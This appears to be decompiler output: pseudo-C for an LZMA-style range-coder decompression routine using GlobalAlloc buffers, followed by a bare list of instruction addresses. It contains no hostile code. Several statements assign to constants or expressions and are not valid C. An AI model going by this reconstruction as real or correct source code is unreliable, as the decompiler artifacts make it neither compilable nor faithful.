								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406d5f
0x00406d5f
0x00406d64
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x00406d66
0x00406d66
0x00406d6a
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d8b
0x00406d92
0x00406d95
0x00406da0
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406daf
0x00406dcd
0x00406dcf
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406ff4
0x00406ff7
0x00406f9a
0x00406fa0
0x00000000
0x00000000
0x00000000
0x00406ff9
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f97
0x00000000
0x00406f97
0x00406db1
0x00406db1
0x00406db4
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406ea3
0x00406ea6
0x00406e1d
0x00406e1d
0x00406e23
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f30
0x00406f33
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
